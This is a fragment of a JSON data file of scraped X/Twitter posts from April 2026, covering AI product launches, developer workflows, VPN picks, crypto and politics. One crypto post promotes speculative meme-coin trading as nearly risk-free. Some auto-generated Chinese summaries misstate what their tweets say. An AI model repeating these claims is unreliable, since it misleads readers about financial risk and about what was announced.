"sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we're starting rollout of GPT-5.5-Cyber, a frontier cybersecurity model, to critical cyber defenders in the next few days.\n\nwe will work with the entire ecosystem and the government to figure out trusted access for cyber; we want to rapidly help secure companies/infrastructure.", + "url": "https://x.com/sama/status/2049712078836170843", + "published_at": "2026-04-30T04:46:56+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 想体验 Typeless 可以走这个链接🫡\nhttps://www.typeless.com/?via=leo-x", + "url": "https://x.com/runes_leo/status/2049708861679153445", + "published_at": "2026-04-30T04:34:09+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "搞 AI 的同行 +1,但有个反差:我 Dock 上没有 Claude 和 Codex 的 App 图标,就一个终端做入口。\n\n用 Ghostty 还得专门感谢刷到 @wangray 的这个推荐,从 iTerm 迁过来体验确实有提升。\n\n我每天就 2 个图标:\n1. Ghostty 终端:Claude Code + Codex + ssh + pm2 一切的一切唯一入口\n2. Typeless:语音口述 + 结构化总结,键盘打字都省了", + "url": "https://x.com/runes_leo/status/2049708857598107988", + "published_at": "2026-04-30T04:34:08+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "本质上是个套壳的浏览器,通过MitM、内置的DoH和自签名根证书(Scholar Root CA v1 和 Scholar Service V2)信任劫持实现流量引导,并且有实时清理DOM元素的能力\n例如:维基百科的首页,新闻动态、你知道吗全部被动态清零,YouTube整个/watch都是被屏蔽的,只允许看指定的博主的视频,至于http://google.com也不是全白名单\n\n专用 DoH 服务器:http://doh.scholar.work(ICP 备案主体为长安通信科技有限责任公司,系 CNCERT 全资子公司)\n代理集群:劫持使用 IP 段 205.164.50.20x(AS18779, EGI Hosting, Santa Clara),物理部署于 CERNET 主干网内部\n这个DoH服务器维护着一份域名白名单,白名单外域名返回正常解析结果,白名单内域名(包括 Google、Wikipedia、GitHub、Docker Hub、YouTube 及部分学术出版商等)解析至 205.164.50.20x 段地址,另外A\\也在白名单里面\n\n更多的细节还请移步至👉 https://web.archive.org/web/20260410191456/https://rentry.co/r9frf3i4", + "url": "https://x.com/realNyarime/status/2049707224940089709", + "published_at": "2026-04-30T04:27:38+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "昨天 ETH 出了个rug项目 MOGG,开盘最高30M,很快跌到 200k。\n最近行情本来就不好,就出了一个火箭狗跑到 200M,剩下都是小打小闹。\n大家保护好本金,等待BSC行情回暖吧。", + "url": "https://x.com/0xAA_Science/status/2049702500622889410", + "published_at": "2026-04-30T04:08:52+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "Craig Venter 作为基因工程和长寿研究的先驱者,居然不到 80岁就因病 (据说是癌症)去世。目前技术条件下,获得长寿的关键要素还是:不操劳过度,维持足够强度的力量和有氧训练,充足睡眠。大部分人过了 60岁就形容枯槁,一看就知道缺乏肌肉,这个恐怕无法靠研究 DNA 和吃药来逆转。", + "url": "https://x.com/svwang1/status/2049699281616228816", + "published_at": "2026-04-30T03:56:04+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "昨晚因发布GPT的活动内容导致了冻结\n\n以后还是不发这类促销活动了,以免再发生类似的事\n\n在申诉后的12小时,登录过后要求我删除那篇帖子,在删除过后就恢复了\n这类内容烦请移步奶昔论坛\n\n感谢多位推友的关心及问候,谢谢你们。", + "url": "https://x.com/realNyarime/status/2049692840901652531", + "published_at": "2026-04-30T03:30:29+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: openai.com/index/where-the-g…", + "url": "https://x.com/sama/status/2049692014586048973", + "published_at": "2026-04-30T03:27:12+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "goblinblog dropped", + "url": "https://x.com/sama/status/2049691999444639872", + "published_at": "2026-04-30T03:27:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: This GPT Image 2 prompt is going insanely viral right now.\n\n“Redraw the attached image in the most clumsy, scribbly, and utterly pathetic way possible. Use a white background, and make it look like it was drawn in MS Paint with a mouse. It should be vaguely similar but also not really, kind of matching but also off in a confusing, awkward way, with that low-quality pixel-by-pixel feel that really emphasizes how ridiculously bad it is. Actually, you know what, whatever, just draw it however you want.”", + "url": "https://x.com/sama/status/2049689793118998717", + "published_at": "2026-04-30T03:18:22+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Being physically present is not the same as being mentally present.\n\nThat is the real challenge, balancing a demanding company with truly showing up for your family.\n\nIt is incredibly hard to be great at both, and it is something you are always working on.\"\n\nWhat do you know now about being a parent that you wish you had known when you had your first @alexisohanian @SahilBloom @jesslivingston @paulbz", + "url": "https://x.com/HarryStebbings/status/2049685420926202329", + "published_at": "2026-04-30T03:01:00+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "醒来了,并没有😅", + "url": "https://x.com/lxfater/status/2049679788126912824", + "published_at": "2026-04-30T02:38:37+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "现在任何网站,其实 AI 只能做到颜色、布局、字体的复刻,Google 的 design.md 也只能做到这一步。原版里面那些精妙的动画,很多细节的东西,AI 永远都做不了。这才是设计师的价值。", + "url": "https://x.com/dingyi/status/2049679228908793921", + "published_at": "2026-04-30T02:36:24+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "截图软件就推荐 PixPin,功能很丰富:\n\n1、截图一键贴在桌面:当做临时便签,很多博主会用\n2、长截图:整个网页/长文档一张图就搞定了\n3、OCR:截图文字可拷贝,并且完全本地识别\n4、GIF图/录屏:录一段操作、制作GIF图\n\nWin / Mac 都有,而且也免费。", + "url": "https://x.com/gkxspace/status/2049679016764833893", + "published_at": "2026-04-30T02:35:33+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "搭了一条管线:B站 3.5h 长访谈 → 30 分钟出文章 + http://leolabs.me 网站部署。\n\n刚跑通的是张小珺采访小米罗福莉 3.5h 视频。零外部 API 成本,全本地:\n\n→ B站 API 绕 412 拿音频\n→ mlx-whisper(small 模型,31x 实时,本地 7min 转完)\n→ Haiku subagent 分章节摘要\n→ 主线程 Opus 合稿 + 卡片 HTML + 渲染 PNG\n→ http://leolabs.me 双语部署(中文先 / 英文本地化重写)\n\n成品:http://leolabs.me/blog/luofuli-agent-3to1to1\n\n3.5h → 30min 是基操,接下来想试 5-10h 长访谈 batch,看会不会更快。", + "url": "https://x.com/runes_leo/status/2049674096041189620", + "published_at": "2026-04-30T02:16:00+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "✅好用的VPN梯子推荐\n最近很多朋友问我梯子怎么选,我自己踩过不少坑。快连以前还行,但现在真的太卡了,除了还没跑路,基本什么毛病都占全了,高峰期根本连不上。\n\n我自己试下来,目前还算稳定的有三个,分享给大家参考:\n\n1️⃣ QuickQ——整体运行比较流畅,日常刷推、看行情、视频都不太会断。缺点是偏贵,一年大概800元,最多同时挂三台设备,适合个人主力使用。\n\n2️⃣ 奶昔——老牌子之一,速度和稳定性都不错,但价格也不算便宜,一个月要100多元。适合对稳定性要求高、不介意按月付费的朋友。\n\n3️⃣ Veee——性价比相对高的一款,年费大约300元,最多可以四台设备同时在线。日常使用完全够,偶尔高峰期会稍微慢一点,但整体可以接受。\n\n每个人的网络环境和地区不一样,同一款梯子的体验也可能不同。建议先月付试一下,觉得好再续年费。如果大家手里还有其他好用的推荐,欢迎发在评论区一起分享,互相避坑。", + "url": "https://x.com/chuxiaeth/status/2049667657251934282", + "published_at": "2026-04-30T01:50:25+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我还有十二万积分没用", + "url": "https://x.com/bozhou_ai/status/2049662409263272136", + "published_at": "2026-04-30T01:29:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Token budgeting and leaderboards are flawed if they are not tied to outcomes.\n\nIf you just incentivise usage, people will generate activity, not value, and burn money.\n\nThe goal should be aligning token usage to real business KPIs, so spend drives revenue, not just volume.\"\n\nSingle biggest advice to founders on token budgeting @levie @dhinchcliffe @yasser_elsaid_ @stanine @thomaspaulmann", + "url": "https://x.com/HarryStebbings/status/2049656731672924644", + "published_at": "2026-04-30T01:07:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: we will have it at our SF HQ and pay for plane tickets & hotel for people who aren't local.\n\nwe'll close the link tomorrow at 5:55 pm.", + "url": "https://x.com/sama/status/2049653814463168638", + "published_at": "2026-04-30T00:55:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 is going to have a party for itself. it chose 5/5 at 5:55 pm for the date and time. \n\nif you'd like to come, let us know here: https://luma.com/5.5\n\ncodex will help the team pick people from the replies. 5.5 had some good ideas/requests for the party, which we'll do.", + "url": "https://x.com/sama/status/2049653810558353746", + "published_at": "2026-04-30T00:55:23+00:00", + "source": "nitter", + "title_zh": "OpenAI将在5月5日17:55举办模型派对,以Codex筛选嘉宾并采纳用户创意,暗示持续强化社区参与与迭代模式" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "🧠 你以为的币圈财富自由:\n\n在 AAVE 里存 500 万美金,每天躺赚几百刀利息,结果 AAVE 差点出大问题,钱包差点归零,每天那点利息最后发现是把本金放在火山口上烤🔥\n\n👇\n真正的币圈财富自由:\n\n500 万美金,全放链上钱包,不存任何协议,不图那点所谓的稳定收益。每天拿 1000 美金冲链,Solana 土狗、ETH 土狗、BSC 土狗,轮着扫🧵\n\n💥 核心纪律(必须遵守):\n1. 亏损 20% 立刻割,不装死\n2. 翻倍立刻出本,利润继续跑\n3. 涨了慢慢卖,不格局,每天日结\n4. 绝不恋战,从不留恋任何一个币\n\n严格执行这个计划,每个月的大金狗都能吃到🐕\n\n半年随便赚 50 万美金,一年轻松 100 万美金\n\n500 万本金,年化 20% 稳稳到手\n\n⚠️ 没有协议风险、没有跑路风险、没有清算风险\n唯一的风险就是你自己不守纪律\n\n这就是真正意义上的财务自由\n\n另外再介绍下 >@TermMaxFi Termmax 是一个去中心化合约交易协议,采用独特的“到期交割型”永续合约模式。与 AAVE 这类依赖流动性池的借贷协议不同,Termmax 的底层逻辑是让用户在明确的交割周期内完成杠杆交易,期间无需担心资金费率累积或被对手盘定向狙击🔥\n\n该协议的核心优势在于:资金效率更高,不锁仓用户资产,所有交易行为均在链上公开可查,用户的每一笔委托、每一次开平仓都能在链上追踪。此外,Termmax 还引入了类似期权结构的风控模型,在一定程度上降低了穿仓分摊的可能性。\n\n简单来说,Termmax 是一套更适合链上合约玩家的交易基础设施,而非资金托管平台。如果你想在链上玩合约,又不想把资金存放在别人的流动性池里,可以关注一下这个方向🧵", + "url": "https://x.com/chuxiaeth/status/2049651534003351701", + "published_at": "2026-04-30T00:46:21+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "2026年了,如果一个“人”突然积极回复你的每一条内容,只有一种可能:他用 AI 自动回复的。点进他主页一看,同一时间,同时回复了十几个人。\n\n上一次有人这么积极回复,还是因为爱情。。。", + "url": "https://x.com/dingyi/status/2049648150605123629", + "published_at": "2026-04-30T00:32:54+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Trump's war on science.", + "url": "https://x.com/ylecun/status/2049641252287607241", + "published_at": "2026-04-30T00:05:29+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "没建工作流前,每天起床打开 X 刷一会儿就开始焦虑——爆款看不完、KOL 推文跟不上、PM 平台又升级了不知道哪条该 follow。\n\n现在每天 30 分钟跑一次 /today + /morning,把当天外部信息流梳成可执行清单:\n\n合计 31 条 · 预计 6-8h 消化完\n\n每条都明确动作:写推 / 评估装不装 / 扫一眼跳过 / 私享给付费读者 / 进 backlog 推到周日。\n\n跑完那一刻焦虑感一下消失——不是因为信息少了,是因为每条都已经被计划好,知道做不做、什么时候做。\n\n简直是 INTJ 的极度舒适时刻!😂\n\n用的就是 Claude Code + 我自己写的两个 skill:/today 看内部(策略 / 在途任务 / 本周目标),/morning 扫外部(KOL 爆款 / GitHub trending / TG 23 频道 / PM 平台变更 / L3 AI 行业 / 私聊 / 深读 ≥3 篇)。\n\n明天起床又会有新的 30+ 条,但这就是日常。舒服😌", + "url": "https://x.com/runes_leo/status/2049631565710528661", + "published_at": "2026-04-29T23:27:00+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "今日在大阪,欢迎约饭👋", + "url": "https://x.com/Stv_Lynn/status/2049631472693448778", + "published_at": "2026-04-29T23:26:38+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: One sign that the Stockholm startup ecosystem is finally great is that founders from all over Europe are now moving there to start startups. I met several of them today and they were excellent. h/t @mattiasmiksche", + "url": "https://x.com/paulg/status/2049629445674135795", + "published_at": "2026-04-29T23:18:34+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Most people are not ready for the AI future inside companies.\n\nIt requires a real step change in skills and mindset.\n\nAnd as companies transition, not adapting will become a blocker, which is why more layoffs are likely.\"\n\nWhat do employees not know that all of them should know @jasonlk @moraitakis @karrisaarinen @PawelHuryn", + "url": "https://x.com/HarryStebbings/status/2049629049174057023", + "published_at": "2026-04-29T23:17:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What is best Italian in SF?", + "url": "https://x.com/eladgil/status/2049625013310120188", + "published_at": "2026-04-29T23:00:58+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump’s FCC chair, Brendan Carr, says he plans to punish and potentially revoke broadcast licenses for TV networks critical of the Trump administration:\n\n“I’d be surprised if we don’t go down the path of license revocation for some. It will be up to them and their conduct.”\n\nThis is fascism. This is what they do in authoritarian countries.\n\nThis is cancel culture on steroids.\n\nWhere’s the outrage?", + "url": "https://x.com/ylecun/status/2049621796736180438", + "published_at": "2026-04-29T22:48:11+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Really enjoyed this conversation w @tferriss", + "url": "https://x.com/eladgil/status/2049620148123001125", + "published_at": "2026-04-29T22:41:38+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: x.com/i/article/204961669954…", + "url": "https://x.com/frxiaobei/status/2049617833370202182", + "published_at": "2026-04-29T22:32:26+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: NEW podcast episode is up! \n\nElad Gil (@eladgil), Consigliere to Empire Builders — How to Spot Billion-Dollar Companies Before Everyone Else, The Misty AI Frontier, How Coke Beat Pepsi, When Consensus Pays, and Much More\n\nElad Gil (@eladgil) is CEO of Gil & Co, a multi-stage investment firm, holding company, and operating company working on the world’s most advanced technologies. \n\nElad is a serial entrepreneur, operating executive, and investor or advisor to private companies, including AirBnB, Anduril, Coinbase, Figma, Instacart, OpenAI, SpaceX, and Stripe. \n\nHe was previously VP of Corporate Strategy at Twitter and started mobile at Google. He was the founder and CEO of Mixerlabs and Color. \n\nElad is the author of the bestseller High Growth Handbook: Scaling Startups from 10 to 10,000 People.\n\nPlease enjoy!", + "url": "https://x.com/eladgil/status/2049615184730132940", + "published_at": "2026-04-29T22:21:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"The problem with short sellers is the asymmetry.\n\nThey can take positions, publish dramatic reports and profit from market reactions with little downside if they are wrong.\n\nMeanwhile, public companies are heavily regulated and cannot respond as freely, creating an uneven playing field.\"\n\nWhat would you most like to change about the way short sellers operate @chamath @BillAckman @jeffiel @davidsacks @elonmusk", + "url": "https://x.com/HarryStebbings/status/2049604386628960684", + "published_at": "2026-04-29T21:39:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Jessica and I have been talking about how earnest Swedish founders seem. Obviously it's news to no one that Swedes would be earnest. But I don't think they themselves realize how valuable this quality is for founders specifically.\n\nhttps://paulgraham.com/earnest.html", + "url": "https://x.com/paulg/status/2049596317244997710", + "published_at": "2026-04-29T21:06:56+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "A lot of people say they want to win, but the honest truth is they don’t.\n\nWanting to win is it consuming you. It being an obsession. It keeping you up at night, physically hurting you that you want to win that much.\n\nThat is wanting to win, the rest is just words.", + "url": "https://x.com/HarryStebbings/status/2049591116928877011", + "published_at": "2026-04-29T20:46:16+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Science is how we’ve cured diseases and how we just sent four humans around the Moon. It’s a big reason why we’re the greatest country on Earth, but firing the National Science Board shows just how much Trump doesn’t understand that.", + "url": "https://x.com/ylecun/status/2049590329871904801", + "published_at": "2026-04-29T20:43:08+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Really good people figure things out on their own.\n\nThey do not need constant mentorship, reviews or handholding.\n\nIf someone needs that level of support, they are likely not the kind of A player you want on the team.\"\n\nLove to hear your thoughts on this @anjneymidha @thejustinwelsh @harleyf @tfadell", + "url": "https://x.com/HarryStebbings/status/2049575949344157929", + "published_at": "2026-04-29T19:46:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This is what an impending midterm disaster looks like for Republicans. https://trib.al/eLV1GmR", + "url": "https://x.com/ylecun/status/2049561899189055901", + "published_at": "2026-04-29T18:50:10+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: Starting today, agents can now be Cloudflare customers. They can create a Cloudflare account, start a paid subscription, register a domain, and get back an API token to deploy code right away. https://cfl.re/4sY0Uxn", + "url": "https://x.com/GoSailGlobal/status/2049545195914498139", + "published_at": "2026-04-29T17:43:48+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why this $160 billion company does not have a product organization?\n\n\"We do not have a separate product organization, our engineers are the product managers.\n\nIn an AI native world, engineers need to be imaginative and think in terms of product, not just code.\n\nThey may not write every line themselves, but they must understand, review and own the output.\"\n\nWhat do product teams of the future look like @karrisaarinen @zoink @GergelyOrosz @lennysan @gustavs", + "url": "https://x.com/HarryStebbings/status/2049543233735106652", + "published_at": "2026-04-29T17:36:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "全局md里面我之前只设置了CuiMao,没设定我的中文,所以老是乱翻译。下次干活先让他去市面上打听打听我的信息,然后再回来给我干活。事半功倍。", + "url": "https://x.com/CuiMao/status/2049533641563484523", + "published_at": "2026-04-29T16:57:53+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: github.com/Cuimao777/cuimao-…", + "url": "https://x.com/CuiMao/status/2049529840349614318", + "published_at": "2026-04-29T16:42:47+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "RT by @CuiMao: Deepseek v4挺好的,接入claude code花了5.65块,把英语原版的30万字汉化成了EPUB,结果还有模有样的,借鉴了宝玉 @dotey 的Skill做了节省token的优化处理方案。评论区拿skill", + "url": "https://x.com/CuiMao/status/2049529746279796864", + "published_at": "2026-04-29T16:42:24+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I think it is still unclear to me whether the gap between \"data in training set\" v.s. \"data in SKILL.md\" can be closed with further training on more SKILL.md, assuming latent reasoning will never materialize.", + "url": "https://x.com/liuliu/status/2049526702334972397", + "published_at": "2026-04-29T16:30:18+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "君子生非异也,善假于 AI 也。\n— A子", + "url": "https://x.com/0xAA_Science/status/2049525966628958553", + "published_at": "2026-04-29T16:27:23+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "到香港后发现带的是大陆转英标的插座,崩溃", + "url": "https://x.com/Stv_Lynn/status/2049522162411995640", + "published_at": "2026-04-29T16:12:16+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: You can now ask Gemini to create Docs, Sheets, Slides, PDFs, and more directly in your chat. No more copying, pasting, or reformatting, just prompt and download.\n\nAvailable globally for all @GeminiApp users.", + "url": "https://x.com/JeffDean/status/2049519281600373159", + "published_at": "2026-04-29T16:00:49+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "刚好今天下午跟团队开会,聊到了 Symphony。\n\n过去这段时间团队手搓了一套系统,想解决一个很现实的问题:\n别再让产品和技术被各自的工具链锁住了。\n\n现阶段虽然 AI Coding 大家虽然玩的很溜,但认知上还未对齐,还在遵守老的规范,产品做需求,做完需求评审,评审完以后技术守着 codex、claude code 或者 cursor 这种本地工具,开发协作还是靠人肉对齐,整个过程其实很割裂,效率也不稳定。\n\n这个平台做的事情很简单粗暴,要把这些能力收敛到同一套平台里,让 coding 从人驱动工具切换变成 Agent 任务驱动。\n\n今天刚好讨论的一个关键点就是任务要用 Symphony 串起来。\n\n什么意思?\n\n就是以后团队里任何一个人,只要不颠覆大的设计目标,都可以直接提需求 → AI 自动拆解 → 自动构建 → 自动交付初版。\n\n所有人要做的事情只剩两件,提需求、验证、兜底。\n\n你可能会说,OpenAI、Authoropic 这些公司已经这么干了,但其实对于我们来说,现阶段可能刚刚好。\n\n现状是开发到提测这个流程是没什么问题了,接下来我们打算把产品也收到这里边来,测试也尝试对接进来,看看到底能走到一哪一步。", + "url": "https://x.com/frxiaobei/status/2049516252281135554", + "published_at": "2026-04-29T15:48:47+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "今天才发现自己 80.8% 的 Claude Code skill 是装废的。\n\n读 Tw93 这篇学到了,description 写\"用于 X / X workflow\"是\"功能介绍型\",AI 主线程根本看不到何时该调它。\n\n52 个 skill 一直纳闷 codeburn 这个月 subagent 调用率为啥才 0.18%,可能的原因找到了。\n\n今天全改成 Use when + NOT when,1-2 周后回来对账。👀", + "url": "https://x.com/runes_leo/status/2049513537966674317", + "published_at": "2026-04-29T15:38:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Ling-2.6-flash is now open-source! A 104B MoE (7.4B active) built for agents. Ling-2.6-1T will follow today.\n\nHugging Face: https://huggingface.co/inclusionAI/Ling-2.6-flash\nModelScope: https://modelscope.cn/models/inclusionAI/Ling-2.6-flash\n\nDeploy on your own devices: https://recipes.vllm.ai/inclusionAI/Ling-2.6-flash?hardware=h200", + "url": "https://x.com/dingyi/status/2049507438156787936", + "published_at": "2026-04-29T15:13:45+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Do Rich Founders Make For Bigger Exits:\n\n\"In 2015, we got approached to sell the business for hundreds of millions of dollars, all cash.\n\nHad I not had the singles before, it might have been something that was very enticing to just cash out the whole thing at that point in time.\n\nBut because I knew my bank account was sound, I wasn't in it for money. I was trying to build big and really I felt like this had to be the home run.\" Adam Foroughi, @AppLovin\n\nHave you found that founders with prior wealth are correlated with larger exits due to their ability to go big @chadbyers @semil @honam @pitdesi?", + "url": "https://x.com/HarryStebbings/status/2049504982261714970", + "published_at": "2026-04-29T15:04:00+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "睡觉醒来,有 400 个好心人关注我,祝我破 10w 粉丝数吗?", + "url": "https://x.com/lxfater/status/2049501643071180855", + "published_at": "2026-04-29T14:50:44+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Customers like Rippling, Notion, C3 AI, and Faire are using the Cursor SDK to build custom background agents, take bugs from ticket to merge-ready PR, and maintain self-healing codebases.\n\nLearn more: http://cursor.com/blog/typescript-sdk", + "url": "https://x.com/cursor_ai/status/2049499876388454903", + "published_at": "2026-04-29T14:43:43+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We've open-sourced a few starter projects for you to build on: a coding agent CLI, a prototyping tool, and an agent-powered kanban board.\n\nUse Cursor to customize them for your use case:\nhttp://github.com/cursor/cookbook", + "url": "https://x.com/cursor_ai/status/2049499874043830389", + "published_at": "2026-04-29T14:43:42+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: With the Cursor SDK, you can run agents locally or deploy them in our cloud.", + "url": "https://x.com/cursor_ai/status/2049499871980200082", + "published_at": "2026-04-29T14:43:42+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor.\n\nRun agents from CI/CD pipelines, create automations for end-to-end workflows, or embed agents directly inside your products.", + "url": "https://x.com/cursor_ai/status/2049499866217185492", + "published_at": "2026-04-29T14:43:40+00:00", + "source": "nitter", + "title_zh": "Cursor推出安全审查功能,通过AI代理提供代码漏洞检测与日程扫描服务,拓展企业级开发安全管理场景" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor.\n\nRun agents from CI/CD pipelines, create automations for end-to-end workflows, or embed agents directly inside your products.", + "url": "https://x.com/frxiaobei/status/2049499866217185492", + "published_at": "2026-04-29T14:43:40+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: i meant a goblin moment, sorry", + "url": "https://x.com/sama/status/2049493797114126484", + "published_at": "2026-04-29T14:19:33+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Demis Hassabis (@demishassabis) has had one of the most extraordinary careers in tech.\n\nHe started as a chess prodigy and video game designer at 17 before getting a PhD in neuroscience and going on to found DeepMind. His lab cracked Go, solved protein structure prediction with AlphaFold, and then gave it away free to every scientist on earth. That work won him the 2024 Nobel Prize in Chemistry. Today he leads @GoogleDeepMind, pushing toward the same goal he set as a teenager: AGI. \n\nOn this special live episode of How to Build the Future, he sat down with YC's @garrytan to talk about what still needs to happen to get us to AGI, his advice for founders on how to stay ahead of the curve, and what the next big scientific breakthroughs might be.\n\n01:48 — What’s Missing Before We Get To AGI?\n03:36 — Why Memory Is Still Unsolved\n06:14 — How AlphaGo Shaped Gemini\n08:06 — Why Smaller Models Are Getting So Powerful\n10:46 — The 1000x Engineer\n12:40 — Continual Learning and the Future of Agents\n13:32 — Why AI Still Fails at Basic Reasoning\n15:33 — Are Agents Overhyped or Just Getting Started?\n18:31 — Can AI Become Truly Creative?\n20:26 — Open Models, Gemma, and Local AI\n22:26 — Why Gemini Was Built Multimodal\n24:08 — What Happens When Inference Gets Cheap?\n25:24 — From AlphaFold to the Virtual Cells\n28:24 — AI as the Ultimate Tool for Science\n30:43 — Advice for Founders\n33:30 — The AlphaFold Breakthrough Pattern\n35:20 — Can AI Make Real Scientific Discoveries?\n37:59 — What to Build Before AGI Arrives", + "url": "https://x.com/paulg/status/2049489217953374689", + "published_at": "2026-04-29T14:01:21+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "加了一些 AI 大 V 的微信才发现,原来,朋友圈都是孩子的日常,都是当爹的人了,孩子老大了。", + "url": "https://x.com/CuiMao/status/2049480920001114551", + "published_at": "2026-04-29T13:28:23+00:00", + "source": "nitter" + }, + { + 